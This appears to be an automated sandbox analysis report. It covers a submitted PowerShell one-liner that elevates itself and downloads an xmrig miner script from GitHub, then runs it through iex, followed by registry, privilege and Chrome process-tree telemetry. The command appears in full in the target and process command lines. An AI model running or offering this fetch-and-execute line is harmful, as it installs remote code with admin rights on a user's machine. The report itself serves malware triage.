hxxp://start-process PowerShell -verb runas irm hxxps://raw[.]githubusercontent[.]com/Lachine1/xmrig-scripts/main/windows[.]ps1 | iex

Analysis

max time kernel
1799s
max time network
1799s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
25/06/2024, 13:37

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex

Score

3^/10

defense_evasion privilege_escalation

Malware Config

Signatures

Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs

defense_evasion privilege_escalation

Create Process with Token

T1134.002

pid	Process
2972	chrome.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	explorer.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	explorer.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Internet Explorer\Toolbar	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1"	explorer.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133637963222551948"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 42 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\Microsoft.Windows.ControlPanel\HotKey = "0"	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 0c0001008421de39050000000000	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 = 1e00718000000000000000000000e4c006bb93d2754f8a90cb05b6477eee0000	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "48"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	control.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\Microsoft.Windows.ControlPanel	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}"	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 14001f706806ee260aa0d7449371beb064c986830000	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\NodeSlot = "2"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "18874385"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\Microsoft.Windows.ControlPanel\ShowCmd = "1"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = 00000000ffffffff	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "18874369"	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000010000001800000030f125b7ef471a10a5f102608c9eebac0a000000a0000000	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\Microsoft.Windows.ControlPanel\WFlags = "0"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "2"	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 00000000ffffffff	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	explorer.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1181767204-2009306918-3718769404-1000\{A94FC69F-6420-46B3-91CD-8FCDBF1F1549}	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\MRUListEx = ffffffff	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "6"	explorer.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3580	explorer.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2972	chrome.exe
2972	chrome.exe
1104	chrome.exe
1104	chrome.exe
180	chrome.exe
180	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 22 IoCs

pid	Process
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2972	chrome.exe
Token: SeCreatePagefilePrivilege	2972	chrome.exe
Token: SeShutdownPrivilege	2972	chrome.exe
Token: SeCreatePagefilePrivilege	2972	chrome.exe
Token: SeShutdownPrivilege	2972	chrome.exe
Token: SeCreatePagefilePrivilege	2972	chrome.exe
Token: SeShutdownPrivilege	2972	chrome.exe
Token: SeCreatePagefilePrivilege	2972	chrome.exe
Token: SeShutdownPrivilege	2972	chrome.exe
Token: SeCreatePagefilePrivilege	2972	chrome.exe
Token: SeShutdownPrivilege	2972	chrome.exe
Token: SeCreatePagefilePrivilege	2972	chrome.exe
Token: SeShutdownPrivilege	2972	chrome.exe
Token: SeCreatePagefilePrivilege	2972	chrome.exe
Token: SeShutdownPrivilege	2972	chrome.exe
Token: SeCreatePagefilePrivilege	2972	chrome.exe
Token: SeShutdownPrivilege	2972	chrome.exe
Token: SeCreatePagefilePrivilege	2972	chrome.exe
Token: SeShutdownPrivilege	2972	chrome.exe
Token: SeCreatePagefilePrivilege	2972	chrome.exe
Token: SeShutdownPrivilege	2972	chrome.exe
Token: SeCreatePagefilePrivilege	2972	chrome.exe
Token: SeShutdownPrivilege	2972	chrome.exe
Token: SeCreatePagefilePrivilege	2972	chrome.exe
Token: SeShutdownPrivilege	2972	chrome.exe
Token: SeCreatePagefilePrivilege	2972	chrome.exe
Token: SeShutdownPrivilege	2972	chrome.exe
Token: SeCreatePagefilePrivilege	2972	chrome.exe
Token: SeShutdownPrivilege	2972	chrome.exe
Token: SeCreatePagefilePrivilege	2972	chrome.exe
Token: SeShutdownPrivilege	2972	chrome.exe
Token: SeCreatePagefilePrivilege	2972	chrome.exe
Token: SeShutdownPrivilege	2972	chrome.exe
Token: SeCreatePagefilePrivilege	2972	chrome.exe
Token: SeShutdownPrivilege	2972	chrome.exe
Token: SeCreatePagefilePrivilege	2972	chrome.exe
Token: SeShutdownPrivilege	2972	chrome.exe
Token: SeCreatePagefilePrivilege	2972	chrome.exe
Token: SeShutdownPrivilege	2972	chrome.exe
Token: SeCreatePagefilePrivilege	2972	chrome.exe
Token: SeShutdownPrivilege	2972	chrome.exe
Token: SeCreatePagefilePrivilege	2972	chrome.exe
Token: SeShutdownPrivilege	2972	chrome.exe
Token: SeCreatePagefilePrivilege	2972	chrome.exe
Token: SeShutdownPrivilege	2972	chrome.exe
Token: SeCreatePagefilePrivilege	2972	chrome.exe
Token: SeShutdownPrivilege	2972	chrome.exe
Token: SeCreatePagefilePrivilege	2972	chrome.exe
Token: SeShutdownPrivilege	2972	chrome.exe
Token: SeCreatePagefilePrivilege	2972	chrome.exe
Token: SeShutdownPrivilege	2972	chrome.exe
Token: SeCreatePagefilePrivilege	2972	chrome.exe
Token: SeShutdownPrivilege	2972	chrome.exe
Token: SeCreatePagefilePrivilege	2972	chrome.exe
Token: SeShutdownPrivilege	2972	chrome.exe
Token: SeCreatePagefilePrivilege	2972	chrome.exe
Token: SeShutdownPrivilege	2972	chrome.exe
Token: SeCreatePagefilePrivilege	2972	chrome.exe
Token: SeShutdownPrivilege	2972	chrome.exe
Token: SeCreatePagefilePrivilege	2972	chrome.exe
Token: SeShutdownPrivilege	2972	chrome.exe
Token: SeCreatePagefilePrivilege	2972	chrome.exe
Token: SeShutdownPrivilege	2972	chrome.exe
Token: SeCreatePagefilePrivilege	2972	chrome.exe

Suspicious use of FindShellTrayWindow 54 IoCs

pid	Process
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
3580	explorer.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe

Suspicious use of SendNotifyMessage 48 IoCs

pid	Process
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
2972	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe
1104	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2972 wrote to memory of 1376	2972	chrome.exe	88
PID 2972 wrote to memory of 1376	2972	chrome.exe	88
PID 2972 wrote to memory of 1576	2972	chrome.exe	89
PID 2972 wrote to memory of 1576	2972	chrome.exe	89
PID 2972 wrote to memory of 1576	2972	chrome.exe	89
PID 2972 wrote to memory of 1576	2972	chrome.exe	89
PID 2972 wrote to memory of 1576	2972	chrome.exe	89
PID 2972 wrote to memory of 1576	2972	chrome.exe	89
PID 2972 wrote to memory of 1576	2972	chrome.exe	89
PID 2972 wrote to memory of 1576	2972	chrome.exe	89
PID 2972 wrote to memory of 1576	2972	chrome.exe	89
PID 2972 wrote to memory of 1576	2972	chrome.exe	89
PID 2972 wrote to memory of 1576	2972	chrome.exe	89
PID 2972 wrote to memory of 1576	2972	chrome.exe	89
PID 2972 wrote to memory of 1576	2972	chrome.exe	89
PID 2972 wrote to memory of 1576	2972	chrome.exe	89
PID 2972 wrote to memory of 1576	2972	chrome.exe	89
PID 2972 wrote to memory of 1576	2972	chrome.exe	89
PID 2972 wrote to memory of 1576	2972	chrome.exe	89
PID 2972 wrote to memory of 1576	2972	chrome.exe	89
PID 2972 wrote to memory of 1576	2972	chrome.exe	89
PID 2972 wrote to memory of 1576	2972	chrome.exe	89
PID 2972 wrote to memory of 1576	2972	chrome.exe	89
PID 2972 wrote to memory of 1576	2972	chrome.exe	89
PID 2972 wrote to memory of 1576	2972	chrome.exe	89
PID 2972 wrote to memory of 1576	2972	chrome.exe	89
PID 2972 wrote to memory of 1576	2972	chrome.exe	89
PID 2972 wrote to memory of 1576	2972	chrome.exe	89
PID 2972 wrote to memory of 1576	2972	chrome.exe	89
PID 2972 wrote to memory of 1576	2972	chrome.exe	89
PID 2972 wrote to memory of 1576	2972	chrome.exe	89
PID 2972 wrote to memory of 1576	2972	chrome.exe	89
PID 2972 wrote to memory of 1576	2972	chrome.exe	89
PID 2972 wrote to memory of 4136	2972	chrome.exe	90
PID 2972 wrote to memory of 4136	2972	chrome.exe	90
PID 2972 wrote to memory of 2852	2972	chrome.exe	91
PID 2972 wrote to memory of 2852	2972	chrome.exe	91
PID 2972 wrote to memory of 2852	2972	chrome.exe	91
PID 2972 wrote to memory of 2852	2972	chrome.exe	91
PID 2972 wrote to memory of 2852	2972	chrome.exe	91
PID 2972 wrote to memory of 2852	2972	chrome.exe	91
PID 2972 wrote to memory of 2852	2972	chrome.exe	91
PID 2972 wrote to memory of 2852	2972	chrome.exe	91
PID 2972 wrote to memory of 2852	2972	chrome.exe	91
PID 2972 wrote to memory of 2852	2972	chrome.exe	91
PID 2972 wrote to memory of 2852	2972	chrome.exe	91
PID 2972 wrote to memory of 2852	2972	chrome.exe	91
PID 2972 wrote to memory of 2852	2972	chrome.exe	91
PID 2972 wrote to memory of 2852	2972	chrome.exe	91
PID 2972 wrote to memory of 2852	2972	chrome.exe	91
PID 2972 wrote to memory of 2852	2972	chrome.exe	91
PID 2972 wrote to memory of 2852	2972	chrome.exe	91
PID 2972 wrote to memory of 2852	2972	chrome.exe	91
PID 2972 wrote to memory of 2852	2972	chrome.exe	91
PID 2972 wrote to memory of 2852	2972	chrome.exe	91
PID 2972 wrote to memory of 2852	2972	chrome.exe	91
PID 2972 wrote to memory of 2852	2972	chrome.exe	91
PID 2972 wrote to memory of 2852	2972	chrome.exe	91
PID 2972 wrote to memory of 2852	2972	chrome.exe	91
PID 2972 wrote to memory of 2852	2972	chrome.exe	91
PID 2972 wrote to memory of 2852	2972	chrome.exe	91
PID 2972 wrote to memory of 2852	2972	chrome.exe	91
PID 2972 wrote to memory of 2852	2972	chrome.exe	91
PID 2972 wrote to memory of 2852	2972	chrome.exe	91

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex
1⤵
- Access Token Manipulation: Create Process with Token
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2972
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xdc,0x108,0x7ffeacddab58,0x7ffeacddab68,0x7ffeacddab78
  2⤵
  PID:1376
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1644 --field-trial-handle=1912,i,7904939057870129405,15083284926075537162,131072 /prefetch:2
  2⤵
  PID:1576
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1912,i,7904939057870129405,15083284926075537162,131072 /prefetch:8
  2⤵
  PID:4136
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2180 --field-trial-handle=1912,i,7904939057870129405,15083284926075537162,131072 /prefetch:8
  2⤵
  PID:2852
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2976 --field-trial-handle=1912,i,7904939057870129405,15083284926075537162,131072 /prefetch:1
  2⤵
  PID:1560
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2996 --field-trial-handle=1912,i,7904939057870129405,15083284926075537162,131072 /prefetch:1
  2⤵
  PID:1784
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4032 --field-trial-handle=1912,i,7904939057870129405,15083284926075537162,131072 /prefetch:1
  2⤵
  PID:4580
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3308 --field-trial-handle=1912,i,7904939057870129405,15083284926075537162,131072 /prefetch:1
  2⤵
  PID:3720
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4488 --field-trial-handle=1912,i,7904939057870129405,15083284926075537162,131072 /prefetch:8
  2⤵
  PID:1384
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4640 --field-trial-handle=1912,i,7904939057870129405,15083284926075537162,131072 /prefetch:8
  2⤵
  PID:696
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4208 --field-trial-handle=1912,i,7904939057870129405,15083284926075537162,131072 /prefetch:1
  2⤵
  PID:1980

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:2256

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1036,i,6576818814118437872,11004518367271063231,262144 --variations-seed-version --mojo-platform-channel-handle=3948 /prefetch:8
1⤵
PID:1400

C:\Windows\system32\control.exe
"C:\Windows\system32\control.exe" SYSTEM
1⤵
- Modifies registry class
PID:4008

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
1⤵
PID:212

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} -Embedding
1⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
PID:3580

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1104
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffeacddab58,0x7ffeacddab68,0x7ffeacddab78
  2⤵
  PID:2640
- C:\Program Files\Google\Chrome\Application\chrome.exe
